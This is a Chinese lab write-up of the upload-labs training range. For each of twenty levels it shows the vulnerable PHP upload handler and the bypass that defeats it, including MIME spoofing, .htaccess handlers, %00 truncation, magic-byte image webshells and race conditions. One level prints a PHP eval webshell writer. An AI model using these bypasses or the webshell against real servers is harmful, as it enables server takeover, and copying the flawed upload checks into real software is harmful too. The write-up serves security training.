文件上传靶场通关笔记

环境搭建

项目地址:Github

1.windows环境安装:

环境集成包下载

搭建过程中,不成功访问时,注意下修改http.conf文件路径

2.linux docker

创建镜像

$ cd upload-labs/docker
$ docker build -t upload-labs .

$ docker pull c0ny1/upload-labs

创建容器

$  docker run -d -p 80:80 upload-labs:latest

本次是在windows 7下实战演练

思维导图

靶机包含漏洞类型分类

判断上传漏洞类型

Pass-01

code:

function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    if (file == null || file == "") {
        alert("请选择要上传的文件!");
        return false;
    }
    //定义允许上传的文件类型
    var allow_ext = ".jpg|.png|.gif";
    //提取上传文件的类型
    var ext_name = file.substring(file.lastIndexOf("."));
    //判断上传文件类型是否允许上传
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
        alert(errMsg);
        return false;
    }
}

exploit:

采取了前端脚本验证上传的文件,利用的几种方式如下:

1.审查元素源码中"定义允许上传的文件类型"中添加.php,再进行上传。
2.浏览器禁用 JavaScript 后,再进行上传。
3.将一句话 1.php 修改为 1.jpg,burpsuite 抓取上传的数据包,修改 jpg 为 php,再提交。

Pass-02

code:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']            
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '文件类型不正确,请重新上传!';
        }
    } else {
        $msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
    }
}

exploit:

代码中验证了上传的MIME类型,绕过方式:burpsuite抓包,发送到Repeater模块,将上传的一句话小马1.php中的

Content-Type: application/php改为Content-Type: image/jpeg,再上传

Pass-03

code:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array('.asp','.aspx','.php','.jsp');
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if(!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            
            if (move_uploaded_file($temp_file,$img_path)) {
                 $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '不允许上传.asp,.aspx,.php,.jsp 后缀文件!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

exploit:

采用了黑名单验证,Apache配置文件http.conf中发现

<IfModule php5_module>
PHPIniDir "D:\soft\upload-labs-env\PHP/"
AddType application/x-httpd-php .php .php3 .phtml
</IfModule>

发现php3 phtml可以被解析。因此将一句话1.php改为1.php3 或者1.phtml,成功上传。

Pass-04

code:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

exploit:

采用了黑名单验证,黑名单防护齐全,考虑其他思路:

思路 1

黑名单中并没有禁止.htaccess文件,可利用Apache的解析漏洞

先上传.htaccess文件,设置允许执行php文件

SetHandler application/x-httpd-php

再将一句话小马1.php修改为1.jpg上传

测试是否成功,用CKnife连接:

思路 2

分析代码:

$file_ext = strrchr($file_name, '.');

strrchr()函数是有点问题的,这个函数的意思是“函数查找字符串在另一个字符串中最后一次出现的位置,并返回从该位置到字符串结尾的所有字符”。

考虑到apache1.x版本和2.x版本是存在解析漏洞的,即“当碰到不认识的扩展名时,将会从后向前解析,直到碰到认识的扩展名,如果都不认识,则会暴露其源码。

比如1.php.xxxxx会被当做PHP脚本执行。

所以将1.php修改为1.php.xxxxx,成功上传。

Cknife连接一句话:

Pass-05

code:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

exploit:

发现代码中没有强制大小写转换,因此一个思路是:修改1.php1.PhP1.phP1.PHP进行上传,成功绕过。

Pass-06

code:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = $_FILES['upload_file']['name'];
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file,$img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

exploit:

发现去掉了首尾去空的代码:

$file_ext = trim($file_ext); //首尾去空

尝试后缀名后边添加空格来进行上传:

Pass-07

code:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

exploit:

思路 1

发现去掉了删除文件名末尾的点的代码:

$file_name = deldot($file_name);//删除文件名末尾的点

尝试后缀名后边添加点来进行上传:

思路 2

发现在上传的文件处理过程中,没有进行时间戳组合命名,可以利用Apache解析漏洞:

1.php修改为1.php.xxxxx,成功上传

Pass-08

code:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

exploit:

发现去掉了去除字符串::$DATA的代码:

$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA

尝试后缀名后边添加::$DATA来进行上传:

Pass-09

code:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

exploit:

思路 1

1.php修改为1.php.xxxxx,成功上传

思路 2

*.php. . (点+空格+点)

Pass-10

code:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");

        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = str_ireplace($deny_ext,"", $file_name);
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = UPLOAD_PATH.'/'.$file_name;        
        if (move_uploaded_file($temp_file, $img_path)) {
            $is_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

exploit:

$file_name = str_ireplace($deny_ext,"", $file_name);

将黑名单中的后缀名替换为空,因此可双写绕过:

Pass-11

code:

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else{
        $msg = "只允许上传.jpg|.png|.gif 类型文件!";
    }
}

exploit:

通过GET方式传入save_path值,使得上传文件路径可控,尝试%00截断,成功上传。

save_path=../upload/1.php%00

使用%00截断的要求:

PHP 版本 < 5.3.4
php.ini 中 magic_quotes_gpc=off

Pass-12

code:

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传失败";
        }
    } else {
        $msg = "只允许上传.jpg|.png|.gif 类型文件!";
    }
}

exploit:

与上一关不同的是,通过POST方式传入save_path值,使得上传文件路径可控,尝试%00截断,需要考虑URL编码。因为在传输过程中,GET方式传输会自动解码成空字符,POST方式不会自动解码,所以要对POST中的%00先进行编码。过程演示:

Pass-13

code:

function getReailFileType($filename){
    $file = fopen($filename, "rb");
    $bin = fread($file, 2); //只读 2 字节
    fclose($file);
    $strInfo = @unpack("C2chars", $bin);    
    $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);    
    $fileType = '';    
    switch($typeCode){      
        case 255216:            
            $fileType = 'jpg';
            break;
        case 13780:            
            $fileType = 'png';
            break;        
        case 7173:            
            $fileType = 'gif';
            break;
        default:            
            $fileType = 'unknown';
        }    
        return $fileType;
}

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_type = getReailFileType($temp_file);

    if($file_type == 'unknown'){
        $msg = "文件未知,上传失败!";
    }else{
        $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传出错!";
        }
    }
}

exploit:

采用了白名单验证,限制上传格式只能是jpg png gif,并且检查文件头的内容。靶场要求配合文件包含,我们只要能成功上传图片并文件包含成功即可。

代码中检测了文件头的2字节内容。查阅资料知,文件头的前2个字节:

JPEG/JPG: FF D8
PNG: 89 50
GIF: 47 49 

与代码中的检测判断一致:

switch($typeCode){      
    case 255216:            //FFD8
        $fileType = 'jpg';
        break;
    case 13780:             //8950
        $fileType = 'png';
        break;
    case 7173:              //4749      
        $fileType = 'gif';
        ...

思路 1:文件头欺骗来绕过

主要思路是将一句话加入文件头的特征码,使得符合代码逻辑,成功上传。

1.php修改为1.gif上传,使用burpsuite抓包,发送到Repeater中。

GIF格式文件头欺骗常见的操作是直接加入”GIF98a” ,G I对应的十六进制编码正是47 49,点Go后成功上传GIF

将文件改为1.jpg,将HEX编码47 49改为FF D8,点Go后成功上传JPG

将文件改为1.png,将HEX编码FF D8 改为89 50,点Go后成功上传PNG

思路 2:利用上传图片马来绕过

制作图片马的方法很多,本次使用cmd制作图片马,此方法需要注意使用的图片格式质量,部分图片合成后包含不成功

通过根目录自带include.php来测试文件包含是否成功:

http://127.0.0.1/include.php?file=upload/2.jpg

解析显示乱码能用Cknife连接,即本次利用成功!(此处仅拿jpg格式为例)

Pass-14

code:

function isImage($filename){
    $types = '.jpg|.png|.gif';
    if(file_exists($filename)){
        $info = getimagesize($filename);
        $ext = image_type_to_extension($info[2]);
        if(stripos($types,$ext)>=0){
            return $ext;
        }else{
            return false;
        }
    }else{
        return false;
    }
}

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $res = isImage($temp_file);
    if(!$res){
        $msg = "文件未知,上传失败!";
    }else{
        $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").$res;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传出错!";
        }
    }
}

exploit:

DVWA File Upload 通关教程 一文中已经提到过,针对getimagesize()函数对文件信息的检测识别,cmdcopy或者十六进制下插入一句话木马的图片,就可以绕过。

直接上传 前面制作过的“图片一句话”即可成功绕过。

Pass-15

code:

function isImage($filename){
    //需要开启 php_exif 模块
    $image_type = exif_imagetype($filename);
    switch ($image_type) {
        case IMAGETYPE_GIF:
            return "gif";
            break;
        case IMAGETYPE_JPEG:
            return "jpg";
            break;
        case IMAGETYPE_PNG:
            return "png";
            break;    
        default:
            return false;
            break;
    }
}

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $res = isImage($temp_file);
    if(!$res){
        $msg = "文件未知,上传失败!";
    }else{
        $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$res;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传出错!";
        }
    }
}

exploit:

查阅资料知:exif_imagetype()读取一个图像的第一个字节并检查其签名。

使用之前的“图片一句话”即可绕过。

Pass-16

code:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
    // 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
    $filename = $_FILES['upload_file']['name'];
    $filetype = $_FILES['upload_file']['type'];
    $tmpname = $_FILES['upload_file']['tmp_name'];

    $target_path=UPLOAD_PATH.'/'.basename($filename);

    // 获得上传文件的扩展名
    $fileext= substr(strrchr($filename,"."),1);

    //判断文件后缀与类型,合法才进行上传操作
    if(($fileext == "jpg") && ($filetype=="image/jpeg")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefromjpeg($target_path);

            if($im == false){
                $msg = "该文件不是 jpg 格式的图片!";
                @unlink($target_path);
            }else{
                //给新图片指定文件名 
                srand(time());
                $newfilename = strval(rand()).".jpg";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagejpeg($im,$img_path);
                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错!";
        }

    }else if(($fileext == "png") && ($filetype=="image/png")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefrompng($target_path);

            if($im == false){
                $msg = "该文件不是 png 格式的图片!";
                @unlink($target_path);
            }else{
                 //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".png";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagepng($im,$img_path);

                @unlink($target_path);
                $is_upload = true;               
            }
        } else {
            $msg = "上传出错!";
        }

    }else if(($fileext == "gif") && ($filetype=="image/gif")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefromgif($target_path);
            if($im == false){
                $msg = "该文件不是 gif 格式的图片!";
                @unlink($target_path);
            }else{
                //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".gif";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagegif($im,$img_path);

                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错!";
        }
    }else{
        $msg = "只允许上传后缀为.jpg|.png|.gif 的图片文件!";
    }
}

exploit:

这关规定了文件的后缀名必须是jpgpnggif,文件类型Content-Type必须为image/jpegimage/pngimage/gif,而且上传后还经过imagecreatefromgif函数进行图片二次渲染的过程。

整理好的POC与一句话:

Github 地址

详细过程参考见:

upload-labs 之 pass 16 详细分析-先知社区

Pass-17

code:

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif 类型文件!";
            unlink($upload_file);
        }
    }else{
        $msg = '上传出错!';
    }
}

exploit:

代码中先上传再进行验证,发现不合格的文件,客户端返回报错之后,再进行删除。很容易想到条件竞争的利用。

使用如下的hack.php

<?php fputs(fopen("./shell.php", "w"), '<?php @eval($_POST["x"]) ?>'); ?>

上传hack.php,发现不合格的文件就会被unlink函数删除掉,但在多线程并发的情况下:即多次上传hack.php的同时,多次访问hack.php,就会出现hack.php成功访问执行的情况,即成功写入一句话木马。

过程演示:

Pass-18

code:

//index.php
$is_upload = false;
$msg = null;
if (isset($_POST['submit']))
{
    require_once("./myupload.php");
    $imgFileName =time();
    $u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);
    $status_code = $u->upload(UPLOAD_PATH);
    switch ($status_code) {
        case 1:
            $is_upload = true;
            $img_path = $u->cls_upload_dir . $u->cls_file_rename_to;
            break;
        case 2:
            $msg = '文件已经被上传,但没有重命名。';
            break; 
        case -1:
            $msg = '这个文件不能上传到服务器的临时文件存储目录。';
            break; 
        case -2:
            $msg = '上传失败,上传目录不可写。';
            break; 
        case -3:
            $msg = '上传失败,无法上传该类型文件。';
            break; 
        case -4:
            $msg = '上传失败,上传的文件过大。';
            break; 
        case -5:
            $msg = '上传失败,服务器已经存在相同名称文件。';
            break; 
        case -6:
            $msg = '文件无法上传,文件不能复制到目标目录。';
            break;      
        default:
            $msg = '未知错误!';
            break;
    }
}

//myupload.php
class MyUpload{
......
......
...... 
  var $cls_arr_ext_accepted = array(
      ".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",
      ".html", ".xml", ".tiff", ".jpeg", ".png" );

......
......
......  
  /** upload()
   **
   ** Method to upload the file.
   ** This is the only method to call outside the class.
   ** @para String name of directory we upload to
   ** @returns void
  **/
  function upload( $dir ){
    
    $ret = $this->isUploadedFile();
    
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->setDir( $dir );
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->checkExtension();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->checkSize();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );    
    }
    
    // if flag to check if the file exists is set to 1
    
    if( $this->cls_file_exists == 1 ){
      
      $ret = $this->checkFileExists();
      if( $ret != 1 ){
        return $this->resultUpload( $ret );    
      }
    }

    // if we are here, we are ready to move the file to destination

    $ret = $this->move();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );    
    }

    // check if we need to rename the file

    if( $this->cls_rename_file == 1 ){
      $ret = $this->renameFile();
      if( $ret != 1 ){
        return $this->resultUpload( $ret );    
      }
    }
    
    // if we are here, everything worked as planned :)

    return $this->resultUpload( "SUCCESS" );
  }
......
......
...... 
};

exploit:

观察源码中,白名单验证,允许上传的类型:

".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",".html", ".xml", ".tiff", ".jpeg", ".png" 

根据白名单的上传类型,上传后再通过rename函数重命名,考虑到条件竞争,可以不断利用burpsuite发送图片马的数据包,程序会出现来不及rename的问题,从而上传成功。

将一句话小马1.php改为1.jpg。上传,使用burpsuite抓取上传数据包,将filename修改为1.php.7z(发现只能是7z格式能成功解析),发送到Intruder中,使用空payload进行Attack

演示过程:

Pass-19

code:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");

        $file_name = $_POST['save_name'];
        $file_ext = pathinfo($file_name,PATHINFO_EXTENSION);

        if(!in_array($file_ext,$deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' .$file_name;
            if (move_uploaded_file($temp_file, $img_path)) { 
                $is_upload = true;
            }else{
                $msg = '上传出错!';
            }
        }else{
            $msg = '禁止保存为该类型文件!';
        }

    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

exploit:

思路 1

pass的取文件名通过POST方式来获取,联想到 使用%00截断

发现move_uploaded_file()函数中的img_path是由POST方式提交的参数save_name控制的,因此可以在save_name利用%00截断绕过:

利用的漏洞是:

CVE-2015-2348 PHP 任意文件上传漏洞

思路 2

通过pathinfo函数对文件名的后缀名进行黑名单检测,但是我们可以发现,并没有对$file_ext参数进行一系列过滤处理(去点,去空,去::$DATA 字符串,大小写转化)

绕过方式有如下几种:

..
.空格.
/.
::$DATA
大小写

举其中一例:

Pass-20

code:

$is_upload = false;
$msg = null;
if(!empty($_FILES['upload_file'])){
    //检查 MIME
    $allow_type = array('image/jpeg','image/png','image/gif');
    if(!in_array($_FILES['upload_file']['type'],$allow_type)){
        $msg = "禁止上传该类型文件!";
    }else{
        //检查文件名
        $file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
        if (!is_array($file)) {
            $file = explode('.', strtolower($file));
        }

        $ext = end($file);
        $allow_suffix = array('jpg','png','gif');
        if (!in_array($ext, $allow_suffix)) {
            $msg = "禁止上传该后缀文件!";
        }else{
            $file_name = reset($file) . '.' . $file[count($file) - 1];
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' .$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $msg = "文件上传成功!";
                $is_upload = true;
            } else {
                $msg = "文件上传失败!";
            }
        }
    }
}else{
    $msg = "请选择要上传的文件!";
}

exploit:

分析执行流程:

正常情况下

先检查文件类型,通过后,进入检查文件名:

通过post方式提交的save_name,如果为空,$file变量值就为upload_filename值,此时$file不是数组,$file就会被explode函数用”.”分割成字符串数组。取分割后的数组最后一个元素(字符串)作为$ext的值,$ext如果可以匹配jpg png gif其中一个,便可以进行下一步操作:组合得到$file_name

$file_name即为:$file的第一个元素 . $file[count($file) - 1]

通过$file_name得到$img_path,最后用move_uploaded_file()函数移动临时路径$temp_file到路径$img_path

存在绕过的情况

如果$save_name传入的值不为空,$file就是$save_name,我们避免explode函数分割,将$save_name设置为字符串数组。

执行到$ext$ext值为$file数组的最后一个元素,要通过if语句成功进入到else中,则需要$extjpg png gif中的一种,即只需要设置$save_name数组的最后一个元素为jpg png gif中的一种。

进入到else语句中后,组合$file_name

$file_name = reset($file) . '.' . $file[count($file) - 1];

$file_name的前部分为$file数组的第一个元素的值,中间是点,后部分是$file数组的第count($file) - 1个元素的值

因此 可以构造的方式如下:

第(1)种

save_name[1]  abc

save_name[2]  php

save_name[3]  jpg

按代码逻辑,执行得到abc.php

第(2)种

save_name[0] abc.php

save_name[2] jpg

组合的时候,由于save_name[1]为空,即$file[count($file) - 1]为空,使得$file_name只有前部分reset($file)save_name[0],得到abc.php

第(3)种

save_name[0] abc.php%00

save_name[1] jpg

发生了截断,最后生成abc.php

感受

从文件上传靶场里学到了很多东西,很多内容参考网上,在此感谢,如果有错误之处或骚操作,请留言交流!

文章目录

4 条评论

发表评论

*

